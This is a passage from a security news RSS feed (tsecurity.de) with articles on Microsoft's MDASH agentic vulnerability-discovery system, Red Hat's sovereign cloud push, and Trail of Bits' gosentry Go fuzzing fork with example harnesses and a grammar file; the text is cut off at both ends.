<p>“Cyber defenders are facing an increasingly asymmetric battle,” Microsoft added in the blog post. “Attackers are using AI to increase the speed, scale, and sophistication of attacks.”</p>



<h2 class="wp-block-heading">Critical Windows components affected</h2>



<p>The four critical vulnerabilities affected core Windows components broadly deployed across enterprise environments, Microsoft said in the blog.</p>



<p>Among them was CVE-2026-33827, a remote unauthenticated use-after-free flaw in the Windows IPv4 stack reachable through specially crafted packets carrying the Strict Source and Record Route option, Microsoft said.</p>



<p>Another flaw, CVE-2026-33824, involved a pre-authentication double-free issue in the IKEEXT service affecting RRAS VPN, DirectAccess, and Always-On VPN deployments.</p>



<p>Two additional critical flaws affected Netlogon and the Windows DNS Client, both carrying CVSS scores of 9.8.</p>



<p>The remaining 12 vulnerabilities rated “Important” included denial-of-service, privilege-escalation, information disclosure, and security feature bypass flaws affecting components such as tcpip.sys, http.sys, ikeext.dll, and telnet.exe, according to Microsoft.</p>



<h2 class="wp-block-heading">How MDASH orchestrates AI agents</h2>



<p>According to Microsoft, MDASH orchestrates more than 100 specialized AI agents across multiple frontier and distilled models, with each agent assigned to a different stage of the vulnerability discovery pipeline.</p>



<p>Some agents scan source code for potential flaws, others validate whether findings are genuine, and another stage attempts to construct triggering inputs capable of reproducing the issue before the finding reaches a human engineer for review.</p>



<p>“The model is one input. The system is the product,” Taesoo Kim, Microsoft vice president for agentic security, wrote in the blog.</p>



<p>Microsoft said the architecture was intentionally designed to remain largely model-agnostic, allowing the company to swap underlying AI models without rebuilding the broader orchestration pipeline.</p>



<p>That detail matters because MDASH arrives only weeks after Microsoft announced <a href="https://www.csoonline.com/article/4155342/what-anthropic-glasswing-reveals-about-the-future-of-vulnerability-discovery.html">Project Glasswing</a>, a partnership involving Anthropic and others to evaluate AI-driven vulnerability discovery using Anthropic’s Claude Mythos Preview model.</p>



<p>“Microsoft is now operating as platform owner, security vendor, AI infrastructure player, OpenAI partner, Mythos integrator, and agentic security supplier,” said Sanchit Vir Gogia, chief analyst at Greyhound Research. “That is a formidable position. It is also a concentration of influence that security leaders must examine with clear eyes.”</p>



<h2 class="wp-block-heading">AI vs AI vulnerability race</h2>



<p>The announcement also highlights growing concern that AI-driven vulnerability discovery could accelerate offensive operations as well as defensive research.</p>



<p>Anthropic has previously said its Mythos Preview model identified thousands of high-severity vulnerabilities, including a decades-old OpenBSD flaw and a long-undetected FFmpeg issue that traditional fuzzing tools failed to uncover despite millions of attempts.</p>



<p>“We’ve entered an AI-versus-AI vulnerability discovery race,” said Sunil Varkey, advisor at Beagle Security. “The winners won’t be the organizations with the best static scanners anymore. They’ll be the ones who can run these agentic systems fastest against their own code and remediate at machine speed.”</p>



<p>Varkey said enterprises should pursue early access to systems such as MDASH where possible rather than waiting for broader commercial availability.</p>



<p>“Early access isn’t just nice-to-have,” he said. “It’s becoming a defensive necessity in the AI era.”</p>



<p>For CISOs, the broader implication may be that vulnerability management is shifting from periodic scanning toward continuous, AI-assisted discovery and remediation.</p>



<p>“The future belongs to security teams that can find, validate, contain, and fix in one governed motion,” Gogia said.</p>



<h2 class="wp-block-heading">Benchmarks show progress, but analysts urge caution</h2>



<p>To support its claims, Microsoft published benchmark results showing MDASH identified all 21 deliberately planted vulnerabilities in an internal Windows test driver without false positives. The company also said the system successfully recovered nearly all historical Microsoft Security Response Center cases tested against older Windows component snapshots.</p>



<p>On the public CyberGym benchmark for vulnerability reproduction tasks, Microsoft said MDASH achieved a score of 88.45%, topping the public leaderboard at publication time.</p>



<p>Gogia said the results show the category is maturing but warned against treating benchmark scores as direct proof of enterprise value.</p>



<p>“CyberGym is a signal, not a buying decision,” he said. “The machinery around the model is beginning to resemble a serious security research workflow.”</p>



<p>He added that many enterprises still lack the governance maturity required to operationalize machine-generated vulnerability discovery effectively.</p>



<p>“Discovery without remediation discipline is theatre,” Gogia said. “It produces dashboards, not resilience.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Microsoft’s new AI system finds 16 Windows flaws, including four critical RCEs]]></title>
<description><![CDATA[Microsoft has unveiled a new AI-driven vulnerability discovery system that identified 16 previously unknown Windows vulnerabilities, including four critical remote code execution flaws, in what security analysts say could mark a major shift in how software vulnerabilities are discovered and remed...]]></description>
<link>https://tsecurity.de/de/3513648/it-nachrichten/microsofts-new-ai-system-finds-16-windows-flaws-including-four-critical-rces/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3513648/it-nachrichten/microsofts-new-ai-system-finds-16-windows-flaws-including-four-critical-rces/</guid>
<pubDate>Wed, 13 May 2026 14:32:24 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Microsoft has unveiled a new AI-driven vulnerability discovery system that identified 16 previously unknown Windows vulnerabilities, including four critical remote code execution flaws, in what security analysts say could mark a major shift in how software vulnerabilities are discovered and remediated.</p>



<p>The system, codenamed MDASH, was developed by Microsoft’s Autonomous Code Security team alongside the Windows Attack Research and Protection group.</p>



<p>The platform will enter private preview for enterprise customers next month, Microsoft said in a blog <a href="https://www.microsoft.com/en-us/security/blog/2026/05/12/defense-at-ai-speed-microsofts-new-multi-model-agentic-security-system-tops-leading-industry-benchmark/" target="_blank" rel="noreferrer noopener">post</a> announcing the system.</p>



<p>The vulnerabilities were patched as part of Microsoft’s May 12 Patch Tuesday release.</p>



<p>“Cyber defenders are facing an increasingly asymmetric battle,” Microsoft added in the blog post. “Attackers are using AI to increase the speed, scale, and sophistication of attacks.”</p>



<h2 class="wp-block-heading">Critical Windows components affected</h2>



<p>The four critical vulnerabilities affected core Windows components broadly deployed across enterprise environments, Microsoft said in the blog.</p>



<p>Among them was CVE-2026-33827, a remote unauthenticated use-after-free flaw in the Windows IPv4 stack reachable through specially crafted packets carrying the Strict Source and Record Route option, Microsoft said.</p>



<p>Another flaw, CVE-2026-33824, involved a pre-authentication double-free issue in the IKEEXT service affecting RRAS VPN, DirectAccess, and Always-On VPN deployments.</p>



<p>Two additional critical flaws affected Netlogon and the Windows DNS Client, both carrying CVSS scores of 9.8.</p>



<p>The remaining 12 vulnerabilities rated “Important” included denial-of-service, privilege-escalation, information disclosure, and security feature bypass flaws affecting components such as tcpip.sys, http.sys, ikeext.dll, and telnet.exe, according to Microsoft.</p>



<h2 class="wp-block-heading">How MDASH orchestrates AI agents</h2>



<p>According to Microsoft, MDASH orchestrates more than 100 specialized AI agents across multiple frontier and distilled models, with each agent assigned to a different stage of the vulnerability discovery pipeline.</p>



<p>Some agents scan source code for potential flaws, others validate whether findings are genuine, and another stage attempts to construct triggering inputs capable of reproducing the issue before the finding reaches a human engineer for review.</p>



<p>“The model is one input. The system is the product,” Taesoo Kim, Microsoft vice president for agentic security, wrote in the blog.</p>



<p>Microsoft said the architecture was intentionally designed to remain largely model-agnostic, allowing the company to swap underlying AI models without rebuilding the broader orchestration pipeline.</p>



<p>That detail matters because MDASH arrives only weeks after Microsoft announced <a href="https://www.csoonline.com/article/4155342/what-anthropic-glasswing-reveals-about-the-future-of-vulnerability-discovery.html">Project Glasswing</a>, a partnership involving Anthropic and others to evaluate AI-driven vulnerability discovery using Anthropic’s Claude Mythos Preview model.</p>



<p>“Microsoft is now operating as platform owner, security vendor, AI infrastructure player, OpenAI partner, Mythos integrator, and agentic security supplier,” said Sanchit Vir Gogia, chief analyst at Greyhound Research. “That is a formidable position. It is also a concentration of influence that security leaders must examine with clear eyes.”</p>



<h2 class="wp-block-heading">AI vs AI vulnerability race</h2>



<p>The announcement also highlights growing concern that AI-driven vulnerability discovery could accelerate offensive operations as well as defensive research.</p>



<p>Anthropic has previously said its Mythos Preview model identified thousands of high-severity vulnerabilities, including a decades-old OpenBSD flaw and a long-undetected FFmpeg issue that traditional fuzzing tools failed to uncover despite millions of attempts.</p>



<p>“We’ve entered an AI-versus-AI vulnerability discovery race,” said Sunil Varkey, advisor at Beagle Security. “The winners won’t be the organizations with the best static scanners anymore. They’ll be the ones who can run these agentic systems fastest against their own code and remediate at machine speed.”</p>



<p>Varkey said enterprises should pursue early access to systems such as MDASH where possible rather than waiting for broader commercial availability.</p>



<p>“Early access isn’t just nice-to-have,” he said. “It’s becoming a defensive necessity in the AI era.”</p>



<p>For CISOs, the broader implication may be that vulnerability management is shifting from periodic scanning toward continuous, AI-assisted discovery and remediation.</p>



<p>“The future belongs to security teams that can find, validate, contain, and fix in one governed motion,” Gogia said.</p>



<h2 class="wp-block-heading">Benchmarks show progress, but analysts urge caution</h2>



<p>To support its claims, Microsoft published benchmark results showing MDASH identified all 21 deliberately planted vulnerabilities in an internal Windows test driver without false positives. The company also said the system successfully recovered nearly all historical Microsoft Security Response Center cases tested against older Windows component snapshots.</p>



<p>On the public CyberGym benchmark for vulnerability reproduction tasks, Microsoft said MDASH achieved a score of 88.45%, topping the public leaderboard at publication time.</p>



<p>Gogia said the results show the category is maturing but warned against treating benchmark scores as direct proof of enterprise value.</p>



<p>“CyberGym is a signal, not a buying decision,” he said. “The machinery around the model is beginning to resemble a serious security research workflow.”</p>



<p>He added that many enterprises still lack the governance maturity required to operationalize machine-generated vulnerability discovery effectively.</p>



<p>“Discovery without remediation discipline is theatre,” Gogia said. “It produces dashboards, not resilience.”</p>



<p><em>This article originally appeared in <a href="https://www.csoonline.com/article/4170785/microsofts-new-ai-system-finds-16-windows-flaws-including-four-critical-rces.html">CSO</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Red Hat: Sovereignty is more than just compliance]]></title>
<description><![CDATA[Red Hat is attempting to reposition sovereignty from a compliance issue for European companies to a global strategic priority for enterprises, including US firms, who want more control over their enterprise stacks.



Today, Red Hat announced new sovereign and private cloud capabilities that expa...]]></description>
<link>https://tsecurity.de/de/3510206/it-security-nachrichten/red-hat-sovereignty-is-more-than-just-compliance/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3510206/it-security-nachrichten/red-hat-sovereignty-is-more-than-just-compliance/</guid>
<pubDate>Tue, 12 May 2026 14:23:11 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Red Hat is attempting to reposition sovereignty from a compliance issue for European companies to a global strategic priority for enterprises, including US firms, who want <a href="https://www.networkworld.com/article/4137371/digital-sovereignty-options-for-on-prem-deployments.html">more control over their enterprise stacks</a>.</p>



<p>Today, Red Hat <a href="https://www.businesswire.com/news/home/20260512161321/en/Red-Hat-Introduces-New-Sovereign-and-Private-Cloud-Capabilities-to-Power-Digital-Autonomy">announced</a> new sovereign and private cloud capabilities that expand sovereignty to include vendor independence, AI control, and operational autonomy. These new capabilities include streamlined compliance for EU frameworks, production-ready landing zones, a new service provisioning interface for sovereign AI and cloud, on-prem telemetry for data sovereignty, in-region delivery of Red Hat Enterprise Linux distributions in the EU, and premium sovereign support for EU customers.</p>



<p>Red Hat named five customers in the announcement, located in Europe, India, and the United Arab Emirates.</p>



<p>The AI dimension of sovereignty also has an economic angle. <a href="https://www.linkedin.com/in/joefernandes1/">Joe Fernandes</a>, vice president and general manager of the AI business unit at Red Hat, told reporters last week that enterprises are increasingly moving from being “token consumers” — paying hyperscalers per query to call frontier AI models — to becoming “token providers”, meaning that they are running inference on their own infrastructure.</p>



<p>“In sovereign environments, you don’t have the option to run in the public cloud or in shared environments,” he said. “So on-premise or sovereign inference is your only option. And again, efficiency is key to making that a cost-effective proposition for you.”</p>



<p>This week’s Red Hat announcement follows last week’s <a href="https://www.networkworld.com/article/4117292/ibm-pushes-sovereign-computing-with-a-software-stack-that-works-across-cloud-platforms-2.html">IBM announcement of IBM Sovereign Core</a>, a software platform designed to offer enterprises full operational control over sovereign cloud deployments without having to rely on hyperscaler-managed regions. IBM announced the general availability of this product at its Think 2026 conference.</p>



<p>According to Gartner, <a href="https://www.gartner.com/en/newsroom/press-releases/2026-02-09-gartner-says-worldwide-sovereign-cloud-iaas-spending-will-total-us-dollars-80-billion-in-2026">worldwide spending on sovereign cloud infrastructure</a> will hit $80 billion in 2026, up 36% from  2025. Most of the growth in this spending is outside the US, says Gartner analyst Rene Buest in the report, with governments the main buyers, followed by regulated industries and critical infrastructure organizations such as energy, utilities, and telecom.</p>



<p>According to Gartner, China was the biggest spender in 2025, at $36 billion — and expected to grow to $47 billion this year. The US was in second place, at $13 billion last year and an expected $16 billion this year. Europe was in third place, rising from $7 billion in 2025 to $13 billion in 2026. However, Europe is expected to pass the US in sovereign cloud spending in 2027.</p>



<p>In the US, however, sovereign cloud spending isn’t usually labeled as such, says <a href="https://www.linkedin.com/in/jeffpicozzi/">Jeff Picozzi</a>, manager of vertical product marketing at Red Hat. Instead, he says, “it often manifests as a private cloud environment that still adheres to the rigorous requirements of sovereign cloud standards.”</p>



<p>So while explicit compliance requirements might differ, US companies still face comparable challenges to those in Europe or Asia. That includes the need to safeguard their data, Picozzi tells <em>Network World</em>.</p>



<p>“Over the past two decades, many enterprises have relinquished significant control over their technology stack,” he says. “The current shift toward sovereign or private cloud models represents a strategic correction.” It’s not a total reversal, he adds. “But rather a necessary rebalancing of the associated operational and security risks.”</p>



<p>According to Futurum Group analyst <a href="https://www.linkedin.com/in/nickpatience/">Nick Patience</a>, there’s some logic to Red Hat’s approach. “Red Hat’s stack — OpenShift, RHEL, the AI platform — does run across on-premises, public cloud and partner-operated sovereign clouds,” he tells <em>Network World</em>. “So embedding sovereignty capabilities horizontally is defensible.”</p>



<p>According to a recent <a href="https://futurumgroup.com/press-release/organizations-with-a-chief-ai-officer-are-more-likely-to-reach-ai-maturity">Futurum survey</a>, sovereign cloud adoption is a challenge for the majority of AI decision makers, particularly those in health care, energy, and financial services. But few companies make it a top-three vendor selection criterion, he adds. For example, in manufacturing, only 20% use sovereign cloud when choosing vendors, 19% in financial services, and 14% in healthcare. “There’s a gap between them saying it’s important and then using it as a key factor in procurement,” Patience says.</p>



<p>But Red Hat does not itself operate cloud infrastructure, he says. “It is a software and support play, not a cloud play,” he says. Still, for some customers, that could be a feature, not a limitation. “If they’re looking for software tools other than those from a hyperscaler, then Red Hat is in the picture,” he says.</p>



<p>In the US, for most companies, “sovereignty is less about territory and more about auditability, compliance automation, and control plane ownership.”</p>



<p>But data sovereignty does become relevant for US government agencies and regulated sectors such as defense contractors, financial services, and health care, he says, as well as for companies with operations in EMEA and APAC.</p>



<p>In fact, just last month, IBM announced that it has <a href="https://newsroom.ibm.com/2026-04-01-IBM-Expands-FedRAMP-Portfolio-with-Authorization-of-11-Software-Solutions,-Including-watsonx">secured FedRAMP authorization</a> for eleven AI and automation software solutions, several of which run on Red Hat OpenShift and Red Hat AI. This is only “moderate”-level authorization, but IBM says it expects to receive the “high” level by late 2026 or early 2027, which would allow for more sensitive defense and intelligence workloads.</p>



<p>But the most relevant announcement is IBM Sovereign Core. That product is built on top of Red Hat OpenShift and Red Hat AI, Patience says, and provides a customer-operated control plane, in-boundary encryption, and automated compliance against GDPR, DORA, NIS2, and the EU AI Act.</p>



<p>“The [Red Hat] Summit sovereignty announcements and Think 2026 are clearly coordinated,” he says.</p>



<p>Today’s Red Hat sovereignty announcements will help elevate IBM’s sovereignty cloud visibility, he adds. “Red Hat has the technical credibility, and IBM has the enterprise and government relationships,” he says.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Go fuzzing was missing half the toolkit. We forked the toolchain to fix it.]]></title>
<description><![CDATA[Go’s native fuzzing is useful, but it stands far behind state-of-the-art tooling that the Rust, C, and C++ ecosystems offer with LibAFL and AFL++. Path constraints are hard to solve. Structured inputs usually need handmade parsing. It doesn’t even detect several common bug classes, such as intege...]]></description>
<link>https://tsecurity.de/de/3510055/it-security-nachrichten/go-fuzzing-was-missing-half-the-toolkit-we-forked-the-toolchain-to-fix-it/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3510055/it-security-nachrichten/go-fuzzing-was-missing-half-the-toolkit-we-forked-the-toolchain-to-fix-it/</guid>
<pubDate>Tue, 12 May 2026 13:38:43 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Go’s native fuzzing is useful, but it stands far behind state-of-the-art tooling that the Rust, C, and C++ ecosystems offer with LibAFL and AFL++. Path constraints are hard to solve. Structured inputs usually need handmade parsing. It doesn’t even detect several common bug classes, such as integer overflows, goroutine leaks, data races, and execution timeouts. So to make it better, we built <a href="https://github.com/trailofbits/gosentry">gosentry</a>, a fuzzing-oriented fork of the Go toolchain that keeps the standard <code>testing.F</code> workflow while using a stronger fuzzing stack underneath to tackle those issues.</p>
<p>With gosentry, <code>go test -fuzz</code> uses LibAFL by default. It can fuzz structs natively, run grammar-based fuzzing with Nautilus, detect bug classes that it couldn’t detect before, and create a fuzzing campaign coverage report in one command.</p>
<p>If you already have Go fuzz harnesses, you don’t need to rewrite them. Point them at gosentry’s binary and you get all of the above through the same <code>go test -fuzz</code> interface, with a few new flags:</p>
<figure class="highlight">
 <pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl">./bin/go <span class="nb">test</span> -fuzz<span class="o">=</span>FuzzHarness --focus-on-new-code<span class="o">=</span><span class="nb">false</span> --catch-races<span class="o">=</span><span class="nb">true</span> --catch-leaks<span class="o">=</span>true</span></span></code></pre>
 <figcaption><span>Figure 1: Basic gosentry usage</span></figcaption>
</figure>
<p>gosentry keeps the harness API and changes the engine and the surrounding tooling — you just tweak the CLI.</p>
<p>You can also generate coverage reports from an existing campaign with <code>--generate-coverage</code>. Run it from the same package with the same <code>-fuzz</code> target, and no corpus path is needed; gosentry stores the campaign state under Go’s fuzz cache index by package and fuzz target, so restarting the campaign resumes from the existing corpus.</p>
<h2>Why we built gosentry</h2>
<p>We started this project after we released <a href="https://blog.trailofbits.com/2025/12/31/detect-gos-silent-arithmetic-bugs-with-go-panikint/">go-panikint</a> to improve Go fuzzing’s integer overflow detection. We realized that integer overflow detection wasn’t enough. Go’s fuzzing ecosystem was still missing techniques that Rust, C, and C++ researchers already use every day.</p>
<p>We often faced these gaps in our own security work using Go’s vanilla fuzzer:</p>
<ul>
<li>Program comparisons (path constraints) were impossible to solve: one complex <code>if</code> branch, and the Go fuzzer could stay stuck forever.</li>
<li>Grammar-based fuzzing was never an option.</li>
<li>Structure-aware fuzzing required additional manual work.</li>
<li>Several Go bug classes would not crash by default or would depend on external libraries, so the fuzzer could reach insecure target behaviors without reporting them.</li>
<li>Generating coverage reports from a fuzzing campaign was cumbersome.</li>
<li>Making the fuzzer crash on critical error logs required manual code changes.</li>
</ul>
<h2>Same harness, stronger engine</h2>
<p>Gosentry keeps the parts Go developers already know:</p>
<ul>
<li>Write a fuzz target with <code>testing.F</code>, as usual.</li>
<li>Create your initial corpus with <code>f.Add</code>.</li>
<li>Pass the input into <code>f.Fuzz</code>.</li>
</ul>
<p>Under the hood, gosentry captures the fuzz callback, builds a Go archive with libFuzzer-style entry points, and runs it in-process through a Rust-based LibAFL runner. The API stays familiar, but gosentry enhances the engine, scheduling, detectors, and much more.</p>
<p>We designed it this way to avoid friction for developers and security researchers adopting a new tool. Existing Go harnesses do not need to be ported to a new framework. And since the Go toolchain documentation and usage are already widely integrated into LLM pre-training datasets, an agent can easily use gosentry, as it is a fork of the Go toolchain.</p>
<h2>More bugs become visible</h2>
<p>Another added value of gosentry is its capacity to turn more bad behaviors into failures that the vanilla Go fuzzer wouldn’t report.</p>
<p>It includes compiler-inserted integer overflow checks by default and optional truncation checks through the <a href="https://blog.trailofbits.com/2025/12/31/detect-gos-silent-arithmetic-bugs-with-go-panikint/">go-panikint</a> integration. It also lets you choose function calls that should stop the fuzzer. For example, you can use the <code>--panic-on</code> flag to stop fuzzing when <code>log.Fatal</code> is called. This flag is useful for codebases that log critical errors and keep going instead of panicking and reporting the bug to the user.</p>
<p>It can also catch data race issues using the native Go race detector (<code>--catch-races</code>), and goroutine leaks through its <a href="https://github.com/uber-go/goleak">goleak</a> integration (<code>--catch-leaks</code>). Finally, timeouts can be caught at fuzz-time to help detect issues like infinite loops.</p>
<h2>Better inputs</h2>
<p>Gosentry improves input quality in two different ways, which solve different problems.</p>
<h3>Struct-aware fuzzing</h3>
<p>Go’s native fuzzing accepts only a small set of parameter types, which doesn’t include composite types, such as structs, slices, arrays, and pointers. Gosentry supports fuzzing of these types.</p>
<!-- markdownlint-disable MD010 -->
<figure class="highlight">
 <pre tabindex="0" class="chroma"><code class="language-go" data-lang="go"><span class="line"><span class="cl"><span class="kd">type</span><span class="w"> </span><span class="nx">Input</span><span class="w"> </span><span class="kd">struct</span><span class="w"> </span><span class="p">{</span><span class="w">
</span></span></span><span class="line"><span class="cl"><span class="w">	</span><span class="nx">Data</span><span class="w"> </span><span class="p">[]</span><span class="kt">byte</span><span class="w">
</span></span></span><span class="line"><span class="cl"><span class="w">	</span><span class="nx">S</span><span class="w"> </span><span class="kt">string</span><span class="w">
</span></span></span><span class="line"><span class="cl"><span class="w">	</span><span class="nx">N</span><span class="w"> </span><span class="kt">int</span><span class="w">
</span></span></span><span class="line"><span class="cl"><span class="w"></span><span class="p">}</span><span class="w">
</span></span></span><span class="line"><span class="cl"><span class="w">
</span></span></span><span class="line"><span class="cl"><span class="w"></span><span class="kd">func</span><span class="w"> </span><span class="nf">FuzzStructInput</span><span class="p">(</span><span class="nx">f</span><span class="w"> </span><span class="o">*</span><span class="nx">testing</span><span class="p">.</span><span class="nx">F</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w">
</span></span></span><span class="line"><span class="cl"><span class="w">	</span><span class="nx">f</span><span class="p">.</span><span class="nf">Add</span><span class="p">(</span><span class="nx">Input</span><span class="p">{</span><span class="nx">Data</span><span class="p">:</span><span class="w"> </span><span class="p">[]</span><span class="nb">byte</span><span class="p">(</span><span class="s">"hello"</span><span class="p">),</span><span class="w"> </span><span class="nx">S</span><span class="p">:</span><span class="w"> </span><span class="s">"world"</span><span class="p">,</span><span class="w"> </span><span class="nx">N</span><span class="p">:</span><span class="w"> </span><span class="mi">42</span><span class="p">})</span><span class="w">
</span></span></span><span class="line"><span class="cl"><span class="w">	</span><span class="nx">f</span><span class="p">.</span><span class="nf">Fuzz</span><span class="p">(</span><span class="kd">func</span><span class="p">(</span><span class="nx">t</span><span class="w"> </span><span class="o">*</span><span class="nx">testing</span><span class="p">.</span><span class="nx">T</span><span class="p">,</span><span class="w"> </span><span class="nx">in</span><span class="w"> </span><span class="nx">Input</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w">
</span></span></span><span class="line"><span class="cl"><span class="w">		</span><span class="nf">Process</span><span class="p">(</span><span class="nx">in</span><span class="p">)</span><span class="w">
</span></span></span><span class="line"><span class="cl"><span class="w">	</span><span class="p">})</span><span class="w">
</span></span></span><span class="line"><span class="cl"><span class="w"></span><span class="p">}</span></span></span></code></pre>
 <figcaption><span>Figure 2: Supported gosentry harness with structured input</span></figcaption>
</figure>
<!-- markdownlint-enable MD010 -->
<p>Under the hood, gosentry still mutates bytes. The difference is that it encodes and decodes the composite value for you in a proper way, so you don’t have to invent a custom wire format just to fuzz typed Go inputs.</p>
<h3>Grammar-based fuzzing</h3>
<p>In this mode, gosentry uses <a href="https://github.com/nautilus-fuzz/nautilus">Nautilus</a> to generate and mutate grammar-valid inputs while LibAFL still drives the coverage-guided loop.</p>
<p>Let’s imagine you want to fuzz a homemade JSON parser. Without a grammar, most of the time you would generate junk input that wouldn’t even pass the first branches. For example, the fuzzer would mutate <code>{"postOfficeBox": 123}</code> to <code>{postOfficeBox"": """"&amp;%}</code>, while a more interesting generated input of <code>postOfficeBox</code> would be a much larger number like <code>u64.MAX</code>, giving <code>{"postOfficeBox": 18446744073709551615}</code>. In that case, you need grammar-based fuzzing. You define what the structure should be, and the fuzzer generates inputs accordingly. You could write a harness like this:</p>
<!-- markdownlint-disable MD010 -->
<figure class="highlight">
 <pre tabindex="0" class="chroma"><code class="language-go" data-lang="go"><span class="line"><span class="cl"><span class="kd">func</span><span class="w"> </span><span class="nf">FuzzGrammarJSON</span><span class="p">(</span><span class="nx">f</span><span class="w"> </span><span class="o">*</span><span class="nx">testing</span><span class="p">.</span><span class="nx">F</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w">
</span></span></span><span class="line"><span class="cl"><span class="w"></span><span class="nx">f</span><span class="p">.</span><span class="nf">Add</span><span class="p">(</span><span class="s">`{"postOfficeBox":123}`</span><span class="p">)</span><span class="w">
</span></span></span><span class="line"><span class="cl"><span class="w"> 	</span><span class="nx">f</span><span class="p">.</span><span class="nf">Fuzz</span><span class="p">(</span><span class="kd">func</span><span class="p">(</span><span class="nx">t</span><span class="w"> </span><span class="o">*</span><span class="nx">testing</span><span class="p">.</span><span class="nx">T</span><span class="p">,</span><span class="w"> </span><span class="nx">jsonInput</span><span class="w"> </span><span class="kt">string</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w">
</span></span></span><span class="line"><span class="cl"><span class="w"> 		</span><span class="nf">ParseJSONFromString</span><span class="p">(</span><span class="nx">jsonInput</span><span class="p">)</span><span class="w">
</span></span></span><span class="line"><span class="cl"><span class="w"> 	</span><span class="p">})</span><span class="w">
</span></span></span><span class="line"><span class="cl"><span class="w"></span><span class="p">}</span></span></span></code></pre>
 <figcaption><span>Figure 3: Grammar-based harness for our JSON parser</span></figcaption>
</figure>
<!-- markdownlint-enable MD010 -->
<p>The grammar format is a JSON array of rules:</p>
<figure class="highlight">
 <pre tabindex="0" class="chroma"><code class="language-json" data-lang="json"><span class="line"><span class="cl"> <span class="p">[</span>
</span></span><span class="line"><span class="cl"> <span class="p">[</span><span class="s2">"Json"</span><span class="p">,</span> <span class="s2">"\\{\"postOfficeBox\":{Number}\\}"</span><span class="p">],</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"> <span class="p">[</span><span class="s2">"Number"</span><span class="p">,</span> <span class="s2">"{Digit}"</span><span class="p">],</span>
</span></span><span class="line"><span class="cl"> <span class="p">[</span><span class="s2">"Number"</span><span class="p">,</span> <span class="s2">"{Digit}{Number}"</span><span class="p">],</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"> <span class="p">[</span><span class="s2">"Digit"</span><span class="p">,</span> <span class="s2">"0"</span><span class="p">],</span>
</span></span><span class="line"><span class="cl"> <span class="p">[</span><span class="s2">"Digit"</span><span class="p">,</span> <span class="s2">"1"</span><span class="p">],</span>
</span></span><span class="line"><span class="cl"> <span class="p">[</span><span class="s2">"Digit"</span><span class="p">,</span> <span class="s2">"2"</span><span class="p">],</span>
</span></span><span class="line"><span class="cl"> <span class="p">[</span><span class="s2">"Digit"</span><span class="p">,</span> <span class="s2">"3"</span><span class="p">],</span>
</span></span><span class="line"><span class="cl"> <span class="p">[</span><span class="s2">"Digit"</span><span class="p">,</span> <span class="s2">"4"</span><span class="p">],</span>
</span></span><span class="line"><span class="cl"> <span class="p">[</span><span class="s2">"Digit"</span><span class="p">,</span> <span class="s2">"5"</span><span class="p">],</span>
</span></span><span class="line"><span class="cl"> <span class="p">[</span><span class="s2">"Digit"</span><span class="p">,</span> <span class="s2">"6"</span><span class="p">],</span>
</span></span><span class="line"><span class="cl"> <span class="p">[</span><span class="s2">"Digit"</span><span class="p">,</span> <span class="s2">"7"</span><span class="p">],</span>
</span></span><span class="line"><span class="cl"> <span class="p">[</span><span class="s2">"Digit"</span><span class="p">,</span> <span class="s2">"8"</span><span class="p">],</span>
</span></span><span class="line"><span class="cl"> <span class="p">[</span><span class="s2">"Digit"</span><span class="p">,</span> <span class="s2">"9"</span><span class="p">]</span>
</span></span><span class="line"><span class="cl"> <span class="p">]</span></span></span></code></pre>
 <figcaption><span>Figure 4: Definition of our postOfficeBox JSON grammar</span></figcaption>
</figure>
<p>Just note that grammar mode still feeds bytes or strings to the harness. So your target needs to be able to parse either strings or bytes.</p>
<h2>What it has found already</h2>
<p>We’ve been running gosentry on a bunch of targets using grammar-based differential fuzzing campaigns and found a number of bugs. We have disclosed some of these issues to Optimism and Revm:</p>
<ul>
<li><a href="https://github.com/ethereum-optimism/optimism/issues/19334">Unknown batch type panics and causes denial of service in kona-protocol</a></li>
<li><a href="https://github.com/ethereum-optimism/optimism/issues/19333">Kona and op-node can disagree on brotli channels</a></li>
<li><a href="https://github.com/ethereum-optimism/optimism/issues/19335">Kona frame parsing mismatch against op-node and OP Stack Specs</a></li>
<li><a href="https://github.com/bluealloy/revm/issues/3458">Failed deposit in op-revm stopping with <code>OutOfFunds</code> does not bump nonce, leading to a state root mismatch against other clients</a></li>
</ul>
<p>Those are exactly the kinds of bugs we wanted Go fuzzing to expose. They wouldn’t have been easy to find via the native Go fuzzer, but our grammar-based fuzzer via gosentry was able to easily detect them.</p>
<p>Now, see what you can find. If you already have a Go fuzz target, run it under gosentry and see what it can reach compared to the native Go fuzzer.</p>
<p>The project is available on <a href="https://github.com/trailofbits/gosentry">GitHub</a> and includes documentation for each feature described above.</p>
<p>If you’d like to read more about fuzzing, check out the following resources:</p>
<ul>
<li>Our <a href="https://appsec.guide/docs/fuzzing/"><strong>fuzzing chapter</strong></a> in the Testing Handbook</li>
<li><a href="https://blog.trailofbits.com/2024/02/23/continuously-fuzzing-python-c-extensions/"><strong>Continuously fuzzing Python C extensions</strong></a></li>
